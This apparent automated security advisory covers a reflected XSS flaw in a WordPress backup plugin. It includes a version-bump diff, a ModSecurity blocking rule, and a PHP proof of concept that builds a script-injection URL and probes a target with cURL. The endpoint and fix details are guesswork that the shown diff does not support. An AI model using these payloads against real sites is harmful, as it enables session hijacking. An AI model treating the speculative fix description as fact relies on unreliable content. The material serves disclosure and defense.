Atomic Edge analysis of CVE-2026-4305:
This vulnerability is a reflected cross-site scripting (XSS) flaw in the Royal WordPress Backup & Restore Plugin. The vulnerability exists in all plugin versions up to and including 1.0.16. It allows unauthenticated attackers to inject arbitrary JavaScript via the ‘wpr_pending_template’ parameter. Successful exploitation requires tricking an administrator into clicking a malicious link, leading to script execution in the victim’s browser context.
Atomic Edge research identified the root cause as insufficient input sanitization and output escaping for the ‘wpr_pending_template’ parameter. The vulnerable code path involves a request handler that echoes the unsanitized parameter value directly into the HTML response. The diff shows the plugin version number changed from 1.0.16 to 1.0.17 in the main plugin file, royal-backup-reset/royal-backup-reset.php, at lines 7 and 210. This indicates the patch was applied in version 1.0.17.
An attacker exploits this vulnerability by crafting a URL containing a malicious JavaScript payload in the ‘wpr_pending_template’ parameter. The target endpoint is likely an administrative AJAX handler or a direct plugin file accessible without authentication. A sample attack URL could be `https://target.site/wp-admin/admin-ajax.php?action=wpr_action&wpr_pending_template=alert(document.cookie)`. The payload executes when an authenticated administrator visits the crafted link.
The patch in version 1.0.17 adds proper input validation and output escaping for the ‘wpr_pending_template’ parameter. Before the fix, the plugin directly echoed the user-supplied parameter value without sanitization. After the fix, the plugin validates the parameter, likely using WordPress functions like `esc_attr()` or `sanitize_text_field()`, before output. The version number update in the diff serves as an indicator of the fixed release.
If successfully exploited, this vulnerability allows an unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator’s WordPress session. This can lead to session hijacking, site defacement, privilege escalation, or the creation of new administrative accounts. Attackers could also redirect administrators to malicious sites or perform actions on their behalf within the WordPress dashboard.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/royal-backup-reset/royal-backup-reset.php
+++ b/royal-backup-reset/royal-backup-reset.php
@@ -4,7 +4,7 @@
* Plugin URI: http://wordpress.org/plugins/royal-backup-reset/
* Description: Complete backup, restore and reset functionality for WordPress websites.
* Author: wproyal
- * Version: 1.0.16
+ * Version: 1.0.17
* Requires at least: 5.0
* Requires PHP: 7.4
* Tested up to: 6.9.1
@@ -207,7 +207,7 @@
// Set plugin version for asset cache busting and compatibility checks.
if ( ! defined( 'ROYALBR_VERSION' ) ) {
- define( 'ROYALBR_VERSION', '1.0.16' );
+ define( 'ROYALBR_VERSION', '1.0.17' );
}
// Initialize plugin-wide constants including paths and configuration.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20264305,phase:2,deny,status:403,chain,msg:'CVE-2026-4305 via Royal Backup & Restore Plugin AJAX',severity:'CRITICAL',tag:'CVE-2026-4305'"
SecRule ARGS_GET:action "@rx ^wpr_" "chain"
SecRule ARGS_GET:wpr_pending_template "@detectXSS" ""
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4305 - Royal WordPress Backup & Restore Plugin <= 1.0.16 - Reflected Cross-Site Scripting via 'wpr_pending_template' Parameter
<?php
// Configuration
$target_url = 'https://vulnerable-site.example.com';
// Craft the malicious URL with a JavaScript payload in the vulnerable parameter.
// The exact endpoint must be determined, but common patterns include admin-ajax.php.
$endpoint = '/wp-admin/admin-ajax.php';
$malicious_param = 'wpr_pending_template';
// Basic XSS payload to trigger an alert.
$payload = urlencode('<script>alert("XSS via CVE-2026-4305")</script>');
// Build the full attack URL.
$attack_url = $target_url . $endpoint . '?action=wpr_backup_action&' . $malicious_param . '=' . $payload;
// Display the attack URL for manual testing.
echo "Atomic Edge PoC for CVE-2026-4305n";
echo "Target: " . $target_url . "n";
echo "Generated Attack URL: " . $attack_url . "nn";
echo "Instructions: Log in as a WordPress administrator on the target site.n";
echo "Then, visit the above URL in the same browser. If vulnerable, a JavaScript alert will pop up.n";
// Optional: Use cURL to fetch the page and check for the reflected payload (basic detection).
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200) {
// Simple check if the unsanitized parameter is reflected in the response.
$decoded_payload = urldecode($payload);
if (strpos($response, $decoded_payload) !== false) {
echo "n[!] The payload appears to be reflected in the HTTP response. The site may be vulnerable.n";
} else {
echo "n[*] The payload was not found reflected in the response. The endpoint or parameter may be incorrect, or the site may be patched.n";
}
} else {
echo "n[*] HTTP Status: " . $http_code . "n";
}
?>
